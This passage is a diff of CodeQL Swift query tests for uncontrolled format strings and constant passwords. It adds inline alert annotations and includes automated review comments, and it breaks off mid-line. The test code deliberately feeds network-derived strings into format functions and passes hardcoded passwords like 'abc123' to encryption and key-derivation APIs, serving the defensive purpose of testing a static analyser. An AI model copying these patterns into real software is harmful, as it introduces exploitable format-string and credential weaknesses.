| UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:111:33:111:57 | call to NSString.init(string:) | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:111:33:111:57 | call to NSString.init(string:) | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:112:47:112:71 | call to NSString.init(string:) | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:112:47:112:71 | call to NSString.init(string:) | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:115:11:115:11 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:115:11:115:11 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:116:11:116:11 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:116:11:116:11 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:118:61:118:61 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:118:61:118:61 | tainted | This format string depends on $@. 
| UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:130:39:130:39 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:130:39:130:39 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:135:20:135:44 | call to NSString.init(string:) | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:135:20:135:44 | call to NSString.init(string:) | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:141:24:141:24 | cstr | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:141:24:141:24 | cstr | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:143:21:143:21 | cstr | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:143:21:143:21 | cstr | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:145:27:145:27 | cstr | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:145:27:145:27 | cstr | This format string depends on $@. 
| UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:147:35:147:35 | cstr | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:147:35:147:35 | cstr | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:154:26:154:26 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:154:26:154:26 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:156:32:156:32 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:156:32:156:32 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | diff --git a/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.qlref b/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.qlref index 115fef47e47e..62b791e5d6f7 100644 --- a/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.qlref +++ b/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.qlref @@ -1 +1,2 @@ -queries/Security/CWE-134/UncontrolledFormatString.ql \ No newline at end of file +query: queries/Security/CWE-134/UncontrolledFormatString.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.swift b/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.swift index 2e3b082c63ea..e17394cc466d 100644 --- a/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.swift 
+++ b/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.swift @@ -76,7 +76,7 @@ func vasprintf_l(_ ret: UnsafeMutablePointer?>?, _ l func MyLog(_ format: String, _ args: CVarArg...) { withVaList(args) { arglist in - NSLogv(format, arglist) // BAD + NSLogv(format, arglist) // BAD // $ Alert } } 
@@ -88,34 +88,34 @@ class MyString { } func tests() throws { - let tainted = try! String(contentsOf: URL(string: "http://example.com")!) + let tainted = try! String(contentsOf: URL(string: "http://example.com")!) // $ Source _ = String("abc") // GOOD: not a format string _ = String(tainted) // GOOD: not a format string _ = String(format: "abc") // GOOD: not tainted - _ = String(format: tainted) // BAD + _ = String(format: tainted) // BAD // $ Alert _ = String(format: "%s", "abc") // GOOD: not tainted _ = String(format: "%s", tainted) // GOOD: format string itself is not tainted - _ = String(format: tainted, "abc") // BAD - _ = String(format: tainted, tainted) // BAD + _ = String(format: tainted, "abc") // BAD // $ Alert + _ = String(format: tainted, tainted) // BAD // $ Alert - _ = String(format: tainted, arguments: []) // BAD - _ = String(format: tainted, locale: nil) // BAD - _ = String(format: tainted, locale: nil, arguments: []) // BAD - _ = String.localizedStringWithFormat(tainted) // BAD + _ = String(format: tainted, arguments: []) // BAD // $ Alert + _ = String(format: tainted, locale: nil) // BAD // $ Alert + _ = String(format: tainted, locale: nil, arguments: []) // BAD // $ Alert + _ = String.localizedStringWithFormat(tainted) // BAD // $ Alert - _ = NSString(format: NSString(string: tainted), "abc") // BAD - NSString.localizedStringWithFormat(NSString(string: tainted)) // BAD + _ = NSString(format: NSString(string: tainted), "abc") // BAD // $ Alert + NSString.localizedStringWithFormat(NSString(string: tainted)) // BAD // $ Alert - _ = NSMutableString(format: NSString(string: tainted), "abc") // BAD - NSMutableString.localizedStringWithFormat(NSString(string: tainted)) // BAD + _ = NSMutableString(format: NSString(string: tainted), "abc") // BAD // $ Alert + NSMutableString.localizedStringWithFormat(NSString(string: tainted)) // BAD // $ Alert NSLog("abc") // GOOD: not tainted - NSLog(tainted) // BAD - MyLog(tainted) // BAD + NSLog(tainted) // BAD // $ 
Alert + MyLog(tainted) // BAD // $ Alert - NSException.raise(NSExceptionName("exception"), format: tainted, arguments: getVaList([])) // BAD + NSException.raise(NSExceptionName("exception"), format: tainted, arguments: getVaList([])) // BAD // $ Alert let taintedVal = Int(tainted)! let taintedSan = "\(taintedVal)" 
@@ -127,32 +127,32 @@ func tests() throws { _ = String("abc").appendingFormat("%s", "abc") // GOOD: not tainted _ = String("abc").appendingFormat("%s", tainted) // GOOD: format not tainted - _ = String("abc").appendingFormat(tainted, "abc") // BAD + _ = String("abc").appendingFormat(tainted, "abc") // BAD // $ Alert _ = String(tainted).appendingFormat("%s", "abc") // GOOD: format not tainted let s = NSMutableString(string: "foo") s.appendFormat(NSString(string: "%s"), "abc") // GOOD: not tainted - s.appendFormat(NSString(string: tainted), "abc") // BAD + s.appendFormat(NSString(string: tainted), "abc") // BAD // $ Alert _ = NSPredicate(format: tainted) // GOOD: this should be flagged by `swift/predicate-injection`, not `swift/uncontrolled-format-string` tainted.withCString({ cstr in - _ = dprintf(0, cstr, "abc") // BAD + _ = dprintf(0, cstr, "abc") // BAD // $ Alert _ = dprintf(0, "%s", cstr) // GOOD: format not tainted - _ = vprintf(cstr, getVaList(["abc"])) // BAD + _ = vprintf(cstr, getVaList(["abc"])) // BAD // $ Alert _ = vprintf("%s", getVaList([cstr])) // GOOD: format not tainted - _ = vfprintf(nil, cstr, getVaList(["abc"])) // BAD + _ = vfprintf(nil, cstr, getVaList(["abc"])) // BAD // $ Alert _ = vfprintf(nil, "%s", getVaList([cstr])) // GOOD: format not tainted - _ = vasprintf_l(nil, nil, cstr, getVaList(["abc"])) // BAD + _ = vasprintf_l(nil, nil, cstr, getVaList(["abc"])) // BAD // $ Alert _ = vasprintf_l(nil, nil, "%s", getVaList([cstr])) // GOOD: format not tainted }) myFormatMessage(string: tainted, "abc") // BAD [NOT DETECTED] myFormatMessage(string: "%s", tainted) // GOOD: format not tainted - _ = MyString(format: tainted, "abc") // BAD + _ = MyString(format: tainted, "abc") // BAD // $ Alert _ = MyString(format: "%s", tainted) // GOOD: format not tainted - _ = MyString(formatString: tainted, "abc") // BAD + _ = MyString(formatString: tainted, "abc") // BAD // $ Alert _ = MyString(formatString: "%s", tainted) // GOOD: format not tainted } 
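Review bot: `myFormatMessage(string: tainted, "abc") // BAD [NOT DETECTED]` is the one known false negative in this hunk and it is left without an inline expectation. Once the `.qlref` runs the inline-expectations postprocess, nothing machine-checked records that gap. Marking it as `myFormatMessage(string: tainted, "abc") // BAD // $ MISSING: Alert` keeps the missed tainted-format-string sink visible and makes the test report when the query begins to catch it. `tests()` begins outside this hunk.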
diff --git a/swift/ql/test/query-tests/Security/CWE-135/StringLengthConflation.qlref b/swift/ql/test/query-tests/Security/CWE-135/StringLengthConflation.qlref
index d28ad54bed62..888be87992dd 100644
--- a/swift/ql/test/query-tests/Security/CWE-135/StringLengthConflation.qlref
+++ b/swift/ql/test/query-tests/Security/CWE-135/StringLengthConflation.qlref
@@ -1 +1 @@
-queries/Security/CWE-135/StringLengthConflation.ql
\ No newline at end of file
+query: queries/Security/CWE-135/StringLengthConflation.ql
diff --git a/swift/ql/test/query-tests/Security/CWE-259/ConstantPassword.expected b/swift/ql/test/query-tests/Security/CWE-259/ConstantPassword.expected
index 0c1e98bfe7c6..80758dc286ca 100644
--- a/swift/ql/test/query-tests/Security/CWE-259/ConstantPassword.expected
+++ b/swift/ql/test/query-tests/Security/CWE-259/ConstantPassword.expected
@@ -1,3 +1,30 @@ +#select +| rncryptor.swift:77:89:77:89 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:77:89:77:89 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:78:56:78:56 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:78:56:78:56 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:80:89:80:89 | myMaybePassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:80:89:80:89 | myMaybePassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:81:56:81:56 | myMaybePassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:81:56:81:56 | myMaybePassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:91:39:91:39 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:91:39:91:39 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:92:37:92:37 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:92:37:92:37 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:93:39:93:39 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:93:39:93:39 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:94:37:94:37 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:94:37:94:37 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:96:68:96:68 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:96:68:96:68 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:97:68:97:68 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:97:68:97:68 | myConstPassword | The value 'abc123' is used as a constant password. 
| +| rncryptor.swift:98:68:98:68 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:98:68:98:68 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:100:89:100:89 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:100:89:100:89 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:101:97:101:97 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:101:97:101:97 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:102:89:102:89 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:102:89:102:89 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:103:97:103:97 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:103:97:103:97 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:105:32:105:32 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:105:32:105:32 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:107:61:107:61 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:107:61:107:61 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:108:97:108:97 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:108:97:108:97 | myConstPassword | The value 'abc123' is used as a constant password. | +| test.swift:51:30:51:30 | constantPassword | test.swift:43:39:43:134 | [...] | test.swift:51:30:51:30 | constantPassword | The value '[...]' is used as a constant password. | +| test.swift:52:30:52:30 | constantStringPassword | test.swift:29:3:29:3 | this string is constant | test.swift:52:30:52:30 | constantStringPassword | The value 'this string is constant' is used as a constant password. 
| +| test.swift:56:40:56:40 | constantPassword | test.swift:43:39:43:134 | [...] | test.swift:56:40:56:40 | constantPassword | The value '[...]' is used as a constant password. | +| test.swift:57:40:57:40 | constantStringPassword | test.swift:29:3:29:3 | this string is constant | test.swift:57:40:57:40 | constantStringPassword | The value 'this string is constant' is used as a constant password. | +| test.swift:62:40:62:40 | constantPassword | test.swift:43:39:43:134 | [...] | test.swift:62:40:62:40 | constantPassword | The value '[...]' is used as a constant password. | +| test.swift:63:40:63:40 | constantStringPassword | test.swift:29:3:29:3 | this string is constant | test.swift:63:40:63:40 | constantStringPassword | The value 'this string is constant' is used as a constant password. | +| test.swift:67:34:67:34 | constantPassword | test.swift:43:39:43:134 | [...] | test.swift:67:34:67:34 | constantPassword | The value '[...]' is used as a constant password. | +| test.swift:68:34:68:34 | constantStringPassword | test.swift:29:3:29:3 | this string is constant | test.swift:68:34:68:34 | constantStringPassword | The value 'this string is constant' is used as a constant password. | edges | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:77:89:77:89 | myConstPassword | provenance | | | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:78:56:78:56 | myConstPassword | provenance | | 
@@ -64,30 +91,3 @@ nodes | test.swift:67:34:67:34 | constantPassword | semmle.label | constantPassword | | test.swift:68:34:68:34 | constantStringPassword | semmle.label | constantStringPassword | subpaths -#select -| rncryptor.swift:77:89:77:89 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:77:89:77:89 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:78:56:78:56 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:78:56:78:56 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:80:89:80:89 | myMaybePassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:80:89:80:89 | myMaybePassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:81:56:81:56 | myMaybePassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:81:56:81:56 | myMaybePassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:91:39:91:39 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:91:39:91:39 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:92:37:92:37 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:92:37:92:37 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:93:39:93:39 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:93:39:93:39 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:94:37:94:37 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:94:37:94:37 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:96:68:96:68 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:96:68:96:68 | myConstPassword | The value 'abc123' is used as a constant password. 
| -| rncryptor.swift:97:68:97:68 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:97:68:97:68 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:98:68:98:68 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:98:68:98:68 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:100:89:100:89 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:100:89:100:89 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:101:97:101:97 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:101:97:101:97 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:102:89:102:89 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:102:89:102:89 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:103:97:103:97 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:103:97:103:97 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:105:32:105:32 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:105:32:105:32 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:107:61:107:61 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:107:61:107:61 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:108:97:108:97 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:108:97:108:97 | myConstPassword | The value 'abc123' is used as a constant password. | -| test.swift:51:30:51:30 | constantPassword | test.swift:43:39:43:134 | [...] | test.swift:51:30:51:30 | constantPassword | The value '[...]' is used as a constant password. 
| -| test.swift:52:30:52:30 | constantStringPassword | test.swift:29:3:29:3 | this string is constant | test.swift:52:30:52:30 | constantStringPassword | The value 'this string is constant' is used as a constant password. | -| test.swift:56:40:56:40 | constantPassword | test.swift:43:39:43:134 | [...] | test.swift:56:40:56:40 | constantPassword | The value '[...]' is used as a constant password. | -| test.swift:57:40:57:40 | constantStringPassword | test.swift:29:3:29:3 | this string is constant | test.swift:57:40:57:40 | constantStringPassword | The value 'this string is constant' is used as a constant password. | -| test.swift:62:40:62:40 | constantPassword | test.swift:43:39:43:134 | [...] | test.swift:62:40:62:40 | constantPassword | The value '[...]' is used as a constant password. | -| test.swift:63:40:63:40 | constantStringPassword | test.swift:29:3:29:3 | this string is constant | test.swift:63:40:63:40 | constantStringPassword | The value 'this string is constant' is used as a constant password. | -| test.swift:67:34:67:34 | constantPassword | test.swift:43:39:43:134 | [...] | test.swift:67:34:67:34 | constantPassword | The value '[...]' is used as a constant password. | -| test.swift:68:34:68:34 | constantStringPassword | test.swift:29:3:29:3 | this string is constant | test.swift:68:34:68:34 | constantStringPassword | The value 'this string is constant' is used as a constant password. | diff --git a/swift/ql/test/query-tests/Security/CWE-259/ConstantPassword.qlref b/swift/ql/test/query-tests/Security/CWE-259/ConstantPassword.qlref index 0613f1926315..57f452daecff 100644 --- a/swift/ql/test/query-tests/Security/CWE-259/ConstantPassword.qlref +++ b/swift/ql/test/query-tests/Security/CWE-259/ConstantPassword.qlref @@ -1 +1,2 @@ -queries/Security/CWE-259/ConstantPassword.ql +query: queries/Security/CWE-259/ConstantPassword.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/swift/ql/test/query-tests/Security/CWE-259/rncryptor.swift b/swift/ql/test/query-tests/Security/CWE-259/rncryptor.swift index 6de5873c459e..1f65a919d328 100644 --- a/swift/ql/test/query-tests/Security/CWE-259/rncryptor.swift +++ b/swift/ql/test/query-tests/Security/CWE-259/rncryptor.swift @@ -66,7 +66,7 @@ func test(cond: Bool) { let myData = Data(0) let myRandomPassword = getARandomPassword() - let myConstPassword = "abc123" + let myConstPassword = "abc123" // $ Source let myMaybePassword = cond ? myRandomPassword : myConstPassword // reasonable usage @@ -74,11 +74,11 @@ func test(cond: Bool) { let a = try? myEncryptor.encryptData(myData, with: kRNCryptorAES256Settings, password: myRandomPassword) // GOOD let _ = try? myDecryptor.decryptData(a, withPassword: myRandomPassword) // GOOD - let b = try? myEncryptor.encryptData(myData, with: kRNCryptorAES256Settings, password: myConstPassword) // BAD - let _ = try? myDecryptor.decryptData(b, withPassword: myConstPassword) // BAD + let b = try? myEncryptor.encryptData(myData, with: kRNCryptorAES256Settings, password: myConstPassword) // BAD // $ Alert + let _ = try? myDecryptor.decryptData(b, withPassword: myConstPassword) // BAD // $ Alert - let c = try? myEncryptor.encryptData(myData, with: kRNCryptorAES256Settings, password: myMaybePassword) // BAD - let _ = try? myDecryptor.decryptData(c, withPassword: myMaybePassword) // BAD + let c = try? myEncryptor.encryptData(myData, with: kRNCryptorAES256Settings, password: myMaybePassword) // BAD // $ Alert + let _ = try? myDecryptor.decryptData(c, withPassword: myMaybePassword) // BAD // $ Alert // all methods 
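Review bot: The two `myMaybePassword` calls in the `@@ -74,11 +74,11 @@` hunk gain `// $ Alert`, but nothing beside them says why a value that is random on one branch must still be flagged. The only `// $ Source` is the `"abc123"` literal annotated in the `@@ -66,7 +66,7 @@` hunk, and it reaches these sinks through `cond ? myRandomPassword : myConstPassword`. I would spell that out on both lines, for example `// BAD: constant when cond is false // $ Alert`, so the partial-constant case stays recognisable as a deliberate test of the CWE-259 query. `test(cond:)` starts and ends outside both hunks.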
@@ -88,22 +88,22 @@ func test(cond: Bool) { let mySalt = Data(0) let mySalt2 = Data(0) - let _ = myEncryptor.key(forPassword: myConstPassword, salt: mySalt, settings: myKeyDerivationSettings) // BAD - let _ = myEncryptor.keyForPassword(myConstPassword, salt: mySalt, settings: myKeyDerivationSettings) // BAD - let _ = myDecryptor.key(forPassword: myConstPassword, salt: mySalt, settings: myKeyDerivationSettings) // BAD - let _ = myDecryptor.keyForPassword(myConstPassword, salt: mySalt, settings: myKeyDerivationSettings) // BAD + let _ = myEncryptor.key(forPassword: myConstPassword, salt: mySalt, settings: myKeyDerivationSettings) // BAD // $ Alert + let _ = myEncryptor.keyForPassword(myConstPassword, salt: mySalt, settings: myKeyDerivationSettings) // BAD // $ Alert + let _ = myDecryptor.key(forPassword: myConstPassword, salt: mySalt, settings: myKeyDerivationSettings) // BAD // $ Alert + let _ = myDecryptor.keyForPassword(myConstPassword, salt: mySalt, settings: myKeyDerivationSettings) // BAD // $ Alert - let _ = RNEncryptor(settings: kRNCryptorAES256Settings, password: myConstPassword, handler: myHandler) // BAD - let _ = RNEncryptor(settings: kRNCryptorAES256Settings, password: myConstPassword, iv: myIV, encryptionSalt: mySalt, hmacSalt: mySalt2, handler: myHandler) // BAD - let _ = RNEncryptor(settings: kRNCryptorAES256Settings, password: myConstPassword, IV: myIV, encryptionSalt: mySalt, HMACSalt: mySalt2, handler: myHandler) // BAD + let _ = RNEncryptor(settings: kRNCryptorAES256Settings, password: myConstPassword, handler: myHandler) // BAD // $ Alert + let _ = RNEncryptor(settings: kRNCryptorAES256Settings, password: myConstPassword, iv: myIV, encryptionSalt: mySalt, hmacSalt: mySalt2, handler: myHandler) // BAD // $ Alert + let _ = RNEncryptor(settings: kRNCryptorAES256Settings, password: myConstPassword, IV: myIV, encryptionSalt: mySalt, HMACSalt: mySalt2, handler: myHandler) // BAD // $ Alert - let _ = try? 
myEncryptor.encryptData(myData, with: kRNCryptorAES256Settings, password: myConstPassword) // BAD - let _ = try? myEncryptor.encryptData(myData, withSettings: kRNCryptorAES256Settings, password: myConstPassword) // BAD - let _ = try? myEncryptor.encryptData(myData, with: kRNCryptorAES256Settings, password: myConstPassword, iv: myIV, encryptionSalt: mySalt, hmacSalt: mySalt2) // BAD - let _ = try? myEncryptor.encryptData(myData, withSettings: kRNCryptorAES256Settings, password: myConstPassword, IV: myIV, encryptionSalt: mySalt, HMACSalt: mySalt2) // BAD + let _ = try? myEncryptor.encryptData(myData, with: kRNCryptorAES256Settings, password: myConstPassword) // BAD // $ Alert + let _ = try? myEncryptor.encryptData(myData, withSettings: kRNCryptorAES256Settings, password: myConstPassword) // BAD // $ Alert + let _ = try? myEncryptor.encryptData(myData, with: kRNCryptorAES256Settings, password: myConstPassword, iv: myIV, encryptionSalt: mySalt, hmacSalt: mySalt2) // BAD // $ Alert + let _ = try? myEncryptor.encryptData(myData, withSettings: kRNCryptorAES256Settings, password: myConstPassword, IV: myIV, encryptionSalt: mySalt, HMACSalt: mySalt2) // BAD // $ Alert - let _ = RNDecryptor(password: myConstPassword, handler: myHandler) // BAD + let _ = RNDecryptor(password: myConstPassword, handler: myHandler) // BAD // $ Alert - let _ = try? myDecryptor.decryptData(myData, withPassword: myConstPassword) // BAD - let _ = try? myDecryptor.decryptData(myData, withSettings: kRNCryptorAES256Settings, password: myConstPassword) // BAD + let _ = try? myDecryptor.decryptData(myData, withPassword: myConstPassword) // BAD // $ Alert + let _ = try? myDecryptor.decryptData(myData, withSettings: kRNCryptorAES256Settings, password: myConstPassword) // BAD // $ Alert } diff --git a/swift/ql/test/query-tests/Security/CWE-259/test.swift b/swift/ql/test/query-tests/Security/CWE-259/test.swift index 923c49bffbd3..b4870c88c3dc 100644 --- a/swift/ql/test/query-tests/Security/CWE-259/test.swift 
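Review bot: Every call in this "all methods" hunk passes `myConstPassword`, so the new `// $ Alert` markers pin true positives only. No visible line calls `key(forPassword:)`, `keyForPassword`, the `RNEncryptor`/`RNDecryptor` initialisers or the `withSettings:` variants with `myRandomPassword`. One negative case per API would catch a sink model that over-matches, because a `// GOOD` line that starts to alert would then fail the test, for example `let _ = RNDecryptor(password: myRandomPassword, handler: myHandler) // GOOD`. The lines between this hunk and the previous one are not shown, so such cases may already exist there.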
+++ b/swift/ql/test/query-tests/Security/CWE-259/test.swift @@ -26,7 +26,7 @@ final class Scrypt { // Helper functions func getConstantString() -> String { - "this string is constant" + "this string is constant" // $ Source } func getConstantArray() -> Array { @@ -40,7 +40,7 @@ func getRandomArray() -> Array { // --- tests --- func test() { - let constantPassword: Array = [0x2a, 0x3a, 0x80, 0x05, 0xaf, 0x46, 0x58, 0x2d, 0x66, 0x52, 0x10, 0xae, 0x86, 0xd3, 0x8e, 0x8f] + let constantPassword: Array = [0x2a, 0x3a, 0x80, 0x05, 0xaf, 0x46, 0x58, 0x2d, 0x66, 0x52, 0x10, 0xae, 0x86, 0xd3, 0x8e, 0x8f] // $ Source let constantStringPassword = getConstantArray() let randomPassword = getRandomArray() let randomArray = getRandomArray() 
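Review bot: In the `@@ -40,7 +40,7 @@` hunk, `constantStringPassword` sits directly under the newly annotated array literal but has no `// $ Source` of its own. Its source is the string literal inside `getConstantString()`, annotated in the `@@ -26,7 +26,7 @@` hunk; the expected rows pair `constantStringPassword` with `test.swift:29:3`. A plain pointer on the assignment would save the reader a trip to the `.expected` file, for example `let constantStringPassword = getConstantArray() // source: literal in getConstantString()`. How `getConstantArray()` reaches that literal is outside the hunk, so the wording should be checked against its body.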
@@ -48,23 +48,23 @@ func test() { let iterations = 120120 // HKDF test cases - let hkdfb1 = HKDF(password: constantPassword, salt: randomArray, info: randomArray, keyLength: 0, variant: variant) // BAD - let hkdfb2 = HKDF(password: constantStringPassword, salt: randomArray, info: randomArray, keyLength: 0, variant: variant) // BAD + let hkdfb1 = HKDF(password: constantPassword, salt: randomArray, info: randomArray, keyLength: 0, variant: variant) // BAD // $ Alert + let hkdfb2 = HKDF(password: constantStringPassword, salt: randomArray, info: randomArray, keyLength: 0, variant: variant) // BAD // $ Alert let hkdfg1 = HKDF(password: randomPassword, salt: randomArray, info: randomArray, keyLength: 0, variant: variant) // GOOD // PBKDF1 test cases - let pbkdf1b1 = PKCS5.PBKDF1(password: constantPassword, salt: randomArray, iterations: iterations, keyLength: 0) // BAD - let pbkdf1b2 = PKCS5.PBKDF1(password: constantStringPassword, salt: randomArray, iterations: iterations, keyLength: 0) // BAD + let pbkdf1b1 = PKCS5.PBKDF1(password: constantPassword, salt: randomArray, iterations: iterations, keyLength: 0) // BAD // $ Alert + let pbkdf1b2 = PKCS5.PBKDF1(password: constantStringPassword, salt: randomArray, iterations: iterations, keyLength: 0) // BAD // $ Alert let pbkdf1g1 = PKCS5.PBKDF1(password: randomPassword, salt: randomArray, iterations: iterations, keyLength: 0) // GOOD // PBKDF2 test cases - let pbkdf2b1 = PKCS5.PBKDF2(password: constantPassword, salt: randomArray, iterations: iterations, keyLength: 0) // BAD - let pbkdf2b2 = PKCS5.PBKDF2(password: constantStringPassword, salt: randomArray, iterations: iterations, keyLength: 0) // BAD + let pbkdf2b1 = PKCS5.PBKDF2(password: constantPassword, salt: randomArray, iterations: iterations, 